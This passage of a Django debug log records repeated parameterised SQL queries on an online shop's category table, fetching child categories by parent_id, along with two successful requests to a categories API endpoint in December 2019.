"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:55:26,774 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:55:26,776 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:55:26,779 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:55:26,781 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:55:26] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:55:27,281 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:55:27,289 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:55:27,294 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:55:27,297 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:55:27,301 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:55:27,304 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:55:27,306 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:55:27,309 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:55:27,312 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:55:27,317 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:55:27,320 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:55:27,323 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:55:27,326 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:55:27,329 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:55:27,333 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:55:27,336 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:55:27,339 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:55:27,342 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:55:27,345 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:55:27,350 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:55:27,353 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:55:27,356 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:55:27,359 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:55:27,362 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:55:27,365 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:55:27,370 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:55:27,373 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:55:27,377 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:55:27,380 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:55:27,383 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:55:27,388 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:55:27,396 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:55:27,401 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:55:27,405 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:55:27,411 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:55:27,418 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:55:27,421 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:55:27,423 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:55:27,426 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:55:27,428 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:55:27,432 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:55:27,435 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:55:27,438 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:55:27,441 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:55:27,444 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:55:27,446 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:55:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:57:56,312 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:57:56,324 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:57:56,331 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:57:56,336 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:57:56,342 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:57:56,346 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:57:56,416 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:57:56,421 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:57:56,425 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:57:56,431 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:57:56,435 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:57:56,439 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:57:56,443 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:57:56,447 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:57:56,453 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:57:56,457 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:57:56,462 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 